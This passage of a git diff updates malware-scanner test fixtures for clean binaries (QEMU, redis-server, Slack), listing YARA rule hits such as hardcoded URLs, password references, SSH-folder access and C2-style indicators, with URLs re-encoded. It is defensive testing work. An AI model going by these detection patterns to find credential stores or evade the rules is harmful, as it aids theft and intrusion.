[qemu_guest_random_seed_main](https://github.com/search?q=qemu_guest_random_seed_main&type=code)
[rng_random_request_entropy](https://github.com/search?q=rng_random_request_entropy&type=code)
[qemu_fdt_randomize_seeds](https://github.com/search?q=qemu_fdt_randomize_seeds&type=code)
[rng_random_get_filename](https://github.com/search?q=rng_random_get_filename&type=code)
[rng_random_set_filename](https://github.com/search?q=rng_random_set_filename&type=code)
[rng_random_class_init](https://github.com/search?q=rng_random_class_init&type=code)
[qcrypto_random_bytes](https://github.com/search?q=qcrypto_random_bytes&type=code)
[qcrypto_random_init](https://github.com/search?q=qcrypto_random_init&type=code)
[rng_random_finalize](https://github.com/search?q=rng_random_finalize&type=code)
[g_random_int_range](https://github.com/search?q=g_random_int_range&type=code)
[replay_read_random](https://github.com/search?q=replay_read_random&type=code)
[replay_save_random](https://github.com/search?q=replay_save_random&type=code)
[glib_random_bytes](https://github.com/search?q=glib_random_bytes&type=code)
[rng_random_opened](https://github.com/search?q=rng_random_opened&type=code)
[rng_random_info](https://github.com/search?q=rng_random_info&type=code)
[rng_random_init](https://github.com/search?q=rng_random_init&type=code) | -| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [https://wiki.qemu.org/Documentation/9psetup](https://wiki.qemu.org/Documentation/9psetup)
[https://qemu.org/contribute/report](https://qemu.org/contribute/report)
[http://wikipedia.org/wiki/WAV](http://wikipedia.org/wiki/WAV)
[http://www.opensound.com](http://www.opensound.com) | -| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[http://](http://)
[x86_64](https://github.com/search?q=x86_64&type=code) | +| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [https://wiki.qemu.org/Documentation/9psetup](https%3A%2F%2Fwiki.qemu.org%2FDocumentation%2F9psetup)
[https://qemu.org/contribute/report](https%3A%2F%2Fqemu.org%2Fcontribute%2Freport)
[http://wikipedia.org/wiki/WAV](http%3A%2F%2Fwikipedia.org%2Fwiki%2FWAV)
[http://www.opensound.com](http%3A%2F%2Fwww.opensound.com) | +| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https%3A%2F%2F)
[http://](http%3A%2F%2F)
[x86_64](https://github.com/search?q=x86_64&type=code) | | LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [visit_type_SetPasswordOptions_members](https://github.com/search?q=visit_type_SetPasswordOptions_members&type=code)
[obj_change_vnc_password_arg_members](https://github.com/search?q=obj_change_vnc_password_arg_members&type=code)
[Could not set password expire time](https://github.com/search?q=Could+not+set+password+expire+time&type=code)
[qapi_free_ExpirePasswordOptionsVnc](https://github.com/search?q=qapi_free_ExpirePasswordOptionsVnc&type=code)
[type_ExpirePasswordOptions_members](https://github.com/search?q=type_ExpirePasswordOptions_members&type=code)
[please enable password auth using](https://github.com/search?q=please+enable+password+auth+using&type=code)
[visit_type_SetPasswordOptionsVnc](https://github.com/search?q=visit_type_SetPasswordOptionsVnc&type=code)
[qapi_free_SetPasswordOptionsVnc](https://github.com/search?q=qapi_free_SetPasswordOptionsVnc&type=code)
[not support password prompting](https://github.com/search?q=not+support+password+prompting&type=code)
[type_ExpirePasswordOptionsVnc](https://github.com/search?q=type_ExpirePasswordOptionsVnc&type=code)
[visit_type_SetPasswordAction](https://github.com/search?q=visit_type_SetPasswordAction&type=code)
[SetPasswordAction_lookup](https://github.com/search?q=SetPasswordAction_lookup&type=code)
[exit_change_vnc_password](https://github.com/search?q=exit_change_vnc_password&type=code)
[qmp_exit_expire_password](https://github.com/search?q=qmp_exit_expire_password&type=code)
[qmp_marshal_set_password](https://github.com/search?q=qmp_marshal_set_password&type=code)
[that match this password](https://github.com/search?q=that+match+this+password&type=code)
[vnc password expire-time](https://github.com/search?q=vnc+password+expire-time&type=code)
[marshal_expire_password](https://github.com/search?q=marshal_expire_password&type=code)
[qmp_change_vnc_password](https://github.com/search?q=qmp_change_vnc_password&type=code)
[Cannot derive password](https://github.com/search?q=Cannot+derive+password&type=code)
[qmp_enter_set_password](https://github.com/search?q=qmp_enter_set_password&type=code)
[enter_expire_password](https://github.com/search?q=enter_expire_password&type=code)
[monitor_read_password](https://github.com/search?q=monitor_read_password&type=code)
[proxy-password-secret](https://github.com/search?q=proxy-password-secret&type=code)
[qmp_exit_set_password](https://github.com/search?q=qmp_exit_set_password&type=code)
[vnc_display_password](https://github.com/search?q=vnc_display_password&type=code)
[change-vnc-password](https://github.com/search?q=change-vnc-password&type=code)
[hmp_expire_password](https://github.com/search?q=hmp_expire_password&type=code)
[password is expired](https://github.com/search?q=password+is+expired&type=code)
[password is not set](https://github.com/search?q=password+is+not+set&type=code)
[prop_get_passwordid](https://github.com/search?q=prop_get_passwordid&type=code)
[prop_set_passwordid](https://github.com/search?q=prop_set_passwordid&type=code)
[qmp_expire_password](https://github.com/search?q=qmp_expire_password&type=code)
[protocol password](https://github.com/search?q=protocol+password&type=code)
[Invalid password](https://github.com/search?q=Invalid+password&type=code)
[hmp_set_password](https://github.com/search?q=hmp_set_password&type=code)
[qmp_set_password](https://github.com/search?q=qmp_set_password&type=code) | | LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [private_key](https://github.com/search?q=private_key&type=code) | | LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code) | @@ -100,7 +100,7 @@ | LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | | LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvmsg](https://github.com/search?q=recvmsg&type=code) | | LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code)
[sendto](https://github.com/search?q=sendto&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://wiki.qemu.org/Documentation/9psetup](https://wiki.qemu.org/Documentation/9psetup)
[https://qemu.org/contribute/report-a-bug](https://qemu.org/contribute/report-a-bug) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://wiki.qemu.org/Documentation/9psetup](https%3A%2F%2Fwiki.qemu.org%2FDocumentation%2F9psetup)
[https://qemu.org/contribute/report-a-bug](https%3A%2F%2Fqemu.org%2Fcontribute%2Freport-a-bug) | | LOW | [os/env/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/env/get.yara#getenv) | Retrieve environment variables | [getenv](https://github.com/search?q=getenv&type=code) | | LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_wait](https://github.com/search?q=epoll_wait&type=code) | | LOW | [os/kernel/seccomp](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/seccomp.yara#seccomp) | [operate on Secure Computing state of the process](https://man7.org/linux/man-pages/man2/seccomp.2.html) | [seccomp](https://github.com/search?q=seccomp&type=code) | diff --git a/tests/linux/clean/redis-server.aarch64.md b/tests/linux/clean/redis-server.aarch64.md index c08937c6e..6d5824e1e 100644 --- a/tests/linux/clean/redis-server.aarch64.md +++ b/tests/linux/clean/redis-server.aarch64.md @@ -29,9 +29,9 @@ | MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | | MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [Sentinel was not able to save the new configuration on disk!!!](https://github.com/search?q=Sentinel+was+not+able+to+save+the+new+configuration+on+disk%21%21%21&type=code)
[Check your memory ASAP !!!](https://github.com/search?q=Check+your+memory+ASAP+%21%21%21&type=code) | | LOW | [anti-behavior/random_behavior](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/random_behavior.yara#random) | uses a random number generator | [RedisModule_GetRandomHexChars](https://github.com/search?q=RedisModule_GetRandomHexChars&type=code)
[RedisModule_GetRandomBytes](https://github.com/search?q=RedisModule_GetRandomBytes&type=code)
[ziplistRandomPairsUnique](https://github.com/search?q=ziplistRandomPairsUnique&type=code)
[RedisModule_RandomKey](https://github.com/search?q=RedisModule_RandomKey&type=code)
[hashTypeRandomElement](https://github.com/search?q=hashTypeRandomElement&type=code)
[redis_math_randomseed](https://github.com/search?q=redis_math_randomseed&type=code)
[zsetTypeRandomElement](https://github.com/search?q=zsetTypeRandomElement&type=code)
[RM_GetRandomHexChars](https://github.com/search?q=RM_GetRandomHexChars&type=code)
[dictGetFairRandomKey](https://github.com/search?q=dictGetFairRandomKey&type=code)
[lpRandomPairsUnique](https://github.com/search?q=lpRandomPairsUnique&type=code)
[memtest_fill_random](https://github.com/search?q=memtest_fill_random&type=code)
[RM_GetRandomBytes](https://github.com/search?q=RM_GetRandomBytes&type=code)
[getRandomHexChars](https://github.com/search?q=getRandomHexChars&type=code)
[dictGetRandomKey](https://github.com/search?q=dictGetRandomKey&type=code)
[randomkeyCommand](https://github.com/search?q=randomkeyCommand&type=code)
[setTypePopRandom](https://github.com/search?q=setTypePopRandom&type=code)
[lpRandomEntries](https://github.com/search?q=lpRandomEntries&type=code)
[getRandomBytes](https://github.com/search?q=getRandomBytes&type=code)
[zslRandomLevel](https://github.com/search?q=zslRandomLevel&type=code)
[raxRandomWalk](https://github.com/search?q=raxRandomWalk&type=code)
[RM_RandomKey](https://github.com/search?q=RM_RandomKey&type=code)
[intsetRandom](https://github.com/search?q=intsetRandom&type=code)
[lpNextRandom](https://github.com/search?q=lpNextRandom&type=code)
[pseudorandom](https://github.com/search?q=pseudorandom&type=code)
[dbRandomKey](https://github.com/search?q=dbRandomKey&type=code)
[srandom](https://github.com/search?q=srandom&type=code)
[urandom](https://github.com/search?q=urandom&type=code) | -| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [http://pyropus.ca/software/memtester/](http://pyropus.ca/software/memtester/)
[http://github.com/redis/redis/issues](http://github.com/redis/redis/issues)
[https://redis.io/commands/slowlog](https://redis.io/commands/slowlog)
[https://redis.io/topics/latency](https://redis.io/topics/latency)
[http://www.memtest86.com/](http://www.memtest86.com/) | -| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[http://](http://)
[x86](https://github.com/search?q=x86&type=code) | -| LOW | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#os_ref) | references a specific operating system | [https://](https://)
[http://](http://)
[Linux](https://github.com/search?q=Linux&type=code)
[linux](https://github.com/search?q=linux&type=code) | +| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [http://pyropus.ca/software/memtester/](http%3A%2F%2Fpyropus.ca%2Fsoftware%2Fmemtester%2F)
[http://github.com/redis/redis/issues](http%3A%2F%2Fgithub.com%2Fredis%2Fredis%2Fissues)
[https://redis.io/commands/slowlog](https%3A%2F%2Fredis.io%2Fcommands%2Fslowlog)
[https://redis.io/topics/latency](https%3A%2F%2Fredis.io%2Ftopics%2Flatency)
[http://www.memtest86.com/](http%3A%2F%2Fwww.memtest86.com%2F) | +| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https%3A%2F%2F)
[http://](http%3A%2F%2F)
[x86](https://github.com/search?q=x86&type=code) | +| LOW | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#os_ref) | references a specific operating system | [https://](https%3A%2F%2F)
[http://](http%3A%2F%2F)
[Linux](https://github.com/search?q=Linux&type=code)
[linux](https://github.com/search?q=linux&type=code) | | LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [authentication password for the default](https://github.com/search?q=authentication+password+for+the+default&type=code)
[username-password pair or user is](https://github.com/search?q=username-password+pair+or+user+is&type=code)
[for the output password](https://github.com/search?q=for+the+output+password&type=code)
[checkPasswordBasedAuth](https://github.com/search?q=checkPasswordBasedAuth&type=code)
[the number of password](https://github.com/search?q=the+number+of+password&type=code)
[username and password](https://github.com/search?q=username+and+password&type=code)
[ACLCheckPasswordHash](https://github.com/search?q=ACLCheckPasswordHash&type=code)
[tlsPasswordCallback](https://github.com/search?q=tlsPasswordCallback&type=code)
[bit user password](https://github.com/search?q=bit+user+password&type=code)
[ACLHashPassword](https://github.com/search?q=ACLHashPassword&type=code)
[passwords](https://github.com/search?q=passwords&type=code) | | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | | LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | @@ -54,7 +54,7 @@ | LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | | LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recv) | [receive a message to a socket](https://linux.die.net/man/2/recv) | [socket](https://github.com/search?q=socket&type=code)
[recv](https://github.com/search?q=recv&type=code) | | LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#send) | [send a message to a socket](https://linux.die.net/man/2/send) | [socket](https://github.com/search?q=socket&type=code)
[send](https://github.com/search?q=send&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://redis.io/topics/latency-monitor.](https://redis.io/topics/latency-monitor.)
[https://redis.io/commands/slowlog](https://redis.io/commands/slowlog) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://redis.io/topics/latency-monitor.](https%3A%2F%2Fredis.io%2Ftopics%2Flatency-monitor.)
[https://redis.io/commands/slowlog](https%3A%2F%2Fredis.io%2Fcommands%2Fslowlog) | | LOW | [os/env/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/env/get.yara#getenv) | Retrieve environment variables | [getenv](https://github.com/search?q=getenv&type=code) | | LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_create](https://github.com/search?q=epoll_create&type=code)
[epoll_wait](https://github.com/search?q=epoll_wait&type=code) | | LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | diff --git a/tests/linux/clean/slack.md b/tests/linux/clean/slack.md index 2f8908dbe..96198dc05 100644 --- a/tests/linux/clean/slack.md +++ b/tests/linux/clean/slack.md @@ -5,14 +5,14 @@ | MEDIUM | [anti-behavior/LD_DEBUG](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_DEBUG.yara#env_LD_DEBUG) | may check if dynamic linker debugging is enabled | [LD_DEBUG](https://github.com/search?q=LD_DEBUG&type=code) | | MEDIUM | [anti-behavior/LD_PROFILE](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_PROFILE.yara#env_LD_PROFILE) | may check if dynamic linker profiling is enabled | [LD_PROFILE](https://github.com/search?q=LD_PROFILE&type=code) | | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` | -| MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [https://%s](https://%s)
[http://%s](http://%s) | +| MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [https://%s](https%3A%2F%2F%25s)
[http://%s](http%3A%2F%2F%25s) | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [endpoint_port](https://github.com/search?q=endpoint_port&type=code)
[internalPort](https://github.com/search?q=internalPort&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[validatePort](https://github.com/search?q=validatePort&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[inspectPort](https://github.com/search?q=inspectPort&type=code)
[messagePort](https://github.com/search?q=messagePort&type=code)
[origin_port](https://github.com/search?q=origin_port&type=code)
[parent_port](https://github.com/search?q=parent_port&type=code)
[received_ip](https://github.com/search?q=received_ip&type=code)
[relatedPort](https://github.com/search?q=relatedPort&type=code)
[requestPort](https://github.com/search?q=requestPort&type=code)
[required_ip](https://github.com/search?q=required_ip&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[simple_port](https://github.com/search?q=simple_port&type=code)
[source_port](https://github.com/search?q=source_port&type=code)
[allow_port](https://github.com/search?q=allow_port&type=code)
[basic_port](https://github.com/search?q=basic_port&type=code)
[multi_port](https://github.com/search?q=multi_port&type=code)
[parentPort](https://github.com/search?q=parentPort&type=code)
[publicPort](https://github.com/search?q=publicPort&type=code)
[remotePort](https://github.com/search?q=remotePort&type=code)
[sourcePort](https://github.com/search?q=sourcePort&type=code)
[debugPort](https://github.com/search?q=debugPort&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[localPort](https://github.com/search?q=localPort&type=code)
[midi_port](https://github.com/search?q=midi_port&type=code)
[next_port](https://github.com/search?q=next_port&type=code)
[peer_port](https://github.com/search?q=peer_port&type=code)
[public_ip](https://github.com/search?q=public_ip&type=code)
[quic_port](https://github.com/search?q=quic_port&type=code)
[quiche_ip](https://github.com/search?q=quiche_ip&type=code)
[server_ip](https://github.com/search?q=server_ip&type=code)
[stun_port](https://github.com/search?q=stun_port&type=code)
[target_ip](https://github.com/search?q=target_ip&type=code)
[turn_port](https://github.com/search?q=turn_port&type=code)
[any_port](https://github.com/search?q=any_port&type=code)
[check_ip](https://github.com/search?q=check_ip&type=code)
[peerPort](https://github.com/search?q=peerPort&type=code)
[seq_port](https://github.com/search?q=seq_port&type=code)
[set_port](https://github.com/search?q=set_port&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[udp_port](https://github.com/search?q=udp_port&type=code)
[firstIp](https://github.com/search?q=firstIp&type=code)
[hasPort](https://github.com/search?q=hasPort&type=code)
[kPort](https://github.com/search?q=kPort&type=code)
[on_ip](https://github.com/search?q=on_ip&type=code)
[uv_ip](https://github.com/search?q=uv_ip&type=code)
[yoIp](https://github.com/search?q=yoIp&type=code)
[hIp](https://github.com/search?q=hIp&type=code)
[lIp](https://github.com/search?q=lIp&type=code)
[pIp](https://github.com/search?q=pIp&type=code)
[xIp](https://github.com/search?q=xIp&type=code)
[IP](https://github.com/search?q=IP&type=code) | | MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [server_address_](https://github.com/search?q=server_address_&type=code) | | MEDIUM | [c2/client](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/client.yara#clientID) | contains a client ID | [client_id](https://github.com/search?q=client_id&type=code)
[clientId](https://github.com/search?q=clientId&type=code) | | MEDIUM | [c2/discovery/ip_dns_resolver](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/ip-dns_resolver.yara#google_dns_ip) | contains Google Public DNS resolver IP | [2001:4860:4860::8844](https://github.com/search?q=2001%3A4860%3A4860%3A%3A8844&type=code)
[2001:4860:4860::8888](https://github.com/search?q=2001%3A4860%3A4860%3A%3A8888&type=code)
[8.8.4.4](https://github.com/search?q=8.8.4.4&type=code)
[8.8.8.8](https://github.com/search?q=8.8.8.8&type=code) | | MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#remote_control) | Uses terms that may reference remote control abilities | [remote control](https://github.com/search?q=remote+control&type=code) | | MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References a 'dropper' | [openEyeDropper](https://github.com/search?q=openEyeDropper&type=code)
[FrameDropper](https://github.com/search?q=FrameDropper&type=code)
[eye_dropper](https://github.com/search?q=eye_dropper&type=code) | -| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[windows](https://github.com/search?q=windows&type=code)
[darwin](https://github.com/search?q=darwin&type=code)
[Linux](https://github.com/search?q=Linux&type=code)
[linux](https://github.com/search?q=linux&type=code)
[macOS](https://github.com/search?q=macOS&type=code)
[macos](https://github.com/search?q=macos&type=code) | +| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https%3A%2F%2F)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http%3A%2F%2F)
[windows](https://github.com/search?q=windows&type=code)
[darwin](https://github.com/search?q=darwin&type=code)
[Linux](https://github.com/search?q=Linux&type=code)
[linux](https://github.com/search?q=linux&type=code)
[macOS](https://github.com/search?q=macOS&type=code)
[macos](https://github.com/search?q=macos&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [zip_writer](https://github.com/search?q=zip_writer&type=code) | | MEDIUM | [collect/databases/leveldb](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/leveldb.yara#leveldb) | accesses LevelDB databases | [transactional_leveldb_iterator](https://github.com/search?q=transactional_leveldb_iterator&type=code)
[indexed_db_leveldb_operations](https://github.com/search?q=indexed_db_leveldb_operations&type=code)
[OpenAndVerifyLevelDBDatabase](https://github.com/search?q=OpenAndVerifyLevelDBDatabase&type=code)
[LevelDBPartitionedLock](https://github.com/search?q=LevelDBPartitionedLock&type=code)
[LevelDBScopesMetadata](https://github.com/search?q=LevelDBScopesMetadata&type=code)
[LevelDBScopesUndoTask](https://github.com/search?q=LevelDBScopesUndoTask&type=code)
[proto_leveldb_wrapper](https://github.com/search?q=proto_leveldb_wrapper&type=code)
[LEVELDB_TRANSACTION](https://github.com/search?q=LEVELDB_TRANSACTION&type=code)
[leveldb_value_store](https://github.com/search?q=leveldb_value_store&type=code)
[LevelDBTransaction](https://github.com/search?q=LevelDBTransaction&type=code)
[LevelDBWriteErrors](https://github.com/search?q=LevelDBWriteErrors&type=code)
[LevelDBOpenErrors](https://github.com/search?q=LevelDBOpenErrors&type=code)
[LevelDBReadErrors](https://github.com/search?q=LevelDBReadErrors&type=code)
[OpenLevelDBScopes](https://github.com/search?q=OpenLevelDBScopes&type=code)
[LEVELDB_DATABASE](https://github.com/search?q=LEVELDB_DATABASE&type=code)
[LEVELDB_ITERATOR](https://github.com/search?q=LEVELDB_ITERATOR&type=code)
[LevelDBScopesKey](https://github.com/search?q=LevelDBScopesKey&type=code)
[leveldb_database](https://github.com/search?q=leveldb_database&type=code)
[LevelDBIterator](https://github.com/search?q=LevelDBIterator&type=code)
[LevelDBWrapper](https://github.com/search?q=LevelDBWrapper&type=code)
[leveldb_chrome](https://github.com/search?q=leveldb_chrome&type=code)
[leveldb_scopes](https://github.com/search?q=leveldb_scopes&type=code)
[leveldb_proto](https://github.com/search?q=leveldb_proto&type=code)
[lazy_leveldb](https://github.com/search?q=lazy_leveldb&type=code)
[MojoLevelDB](https://github.com/search?q=MojoLevelDB&type=code)
[LevelDBEnv](https://github.com/search?q=LevelDBEnv&type=code)
[leveldb_0x](https://github.com/search?q=leveldb_0x&type=code)
[LevelDBIH](https://github.com/search?q=LevelDBIH&type=code)
[leveldbH](https://github.com/search?q=leveldbH&type=code) | | MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) | @@ -20,13 +20,13 @@ | MEDIUM | [credential/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssh/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [.ssh](https://github.com/search?q=.ssh&type=code) | | MEDIUM | [crypto/cipher](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/cipher.yara#ciphertext) | mentions 'ciphertext' | [ciphertext](https://github.com/search?q=ciphertext&type=code) | | MEDIUM | [crypto/openssl](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/openssl.yara#openssl_user) | Uses OpenSSL | [OpenSSL](https://github.com/search?q=OpenSSL&type=code)
[openssl](https://github.com/search?q=openssl&type=code) | -| MEDIUM | [crypto/rc4](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/rc4.yara#rc4_constants) | [rc4 constants](https://blog.talosintelligence.com/2014/06/an-introduction-to-recognizing-and.html), by shellcromancer | `$opt10`
`$opt11`
`$opt12`
`$opt13`
`$opt14`
`$opt15`
`$opt16`
`$opt17`
`$opt18`
`$opt19`
`$opt20`
`$opt21`
`$opt22`
`$opt23`
`$opt24`
`$opt25`
`$opt26`
`$opt27`
`$opt28`
`$opt29`
`$opt30`
`$opt31`
`$opt32`
`$opt33`
`$opt34`
`$opt35`
`$opt36`
`$opt37`
`$opt38`
`$opt39`
`$opt40`
`$opt41`
`$opt42`
`$opt43`
`$opt44`
`$opt45`
`$opt46`
`$opt47`
`$opt48`
`$opt49`
`$opt50`
`$opt51`
`$opt52`
`$opt53`
`$opt54`
`$opt55`
`$opt56`
`$opt57`
`$opt58`
`$opt59`
`$opt60`
`$opt61`
`$opt62`
`$opt63`
`$opt0`
`$opt7`
`$opt8`
`$opt9`
['&%$](https://github.com/search?q=%27%26%25%24&type=code)
[+*)(](https://github.com/search?q=%2B%2A%29%28&type=code)
[/.-,](https://github.com/search?q=%2F.-%2C&type=code)
[3210](https://github.com/search?q=3210&type=code)
[7654](https://github.com/search?q=7654&type=code)
[;:98](https://github.com/search?q=%3B%3A98&type=code)
[?>=<](https://github.com/search?q=%3F%3E%3D%3C&type=code)
[CBA@](https://github.com/search?q=CBA%40&type=code)
[GFED](https://github.com/search?q=GFED&type=code)
[KJIH](https://github.com/search?q=KJIH&type=code)
[ONML](https://github.com/search?q=ONML&type=code)
[SRQP](https://github.com/search?q=SRQP&type=code)
[WVUT](https://github.com/search?q=WVUT&type=code)
[[ZYX](https://github.com/search?q=%5BZYX&type=code)
[_^]\](https://github.com/search?q=_%5E%5D%5C&type=code)
[cba`](https://github.com/search?q=cba%60&type=code)
[gfed](https://github.com/search?q=gfed&type=code)
[kjih](https://github.com/search?q=kjih&type=code)
[onml](https://github.com/search?q=onml&type=code)
[srqp](https://github.com/search?q=srqp&type=code)
[wvut](https://github.com/search?q=wvut&type=code)
[{zyx](https://github.com/search?q=%7Bzyx&type=code)
[#"!](https://github.com/search?q=%23%22%21&type=code) | +| MEDIUM | [crypto/rc4](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/rc4.yara#rc4_constants) | [rc4 constants](https://blog.talosintelligence.com/2014/06/an-introduction-to-recognizing-and.html), by shellcromancer | `$opt10`
`$opt11`
`$opt12`
`$opt13`
`$opt14`
`$opt15`
`$opt16`
`$opt17`
`$opt18`
`$opt19`
`$opt20`
`$opt21`
`$opt22`
`$opt23`
`$opt24`
`$opt25`
`$opt26`
`$opt27`
`$opt28`
`$opt29`
`$opt30`
`$opt31`
`$opt32`
`$opt33`
`$opt34`
`$opt35`
`$opt36`
`$opt37`
`$opt38`
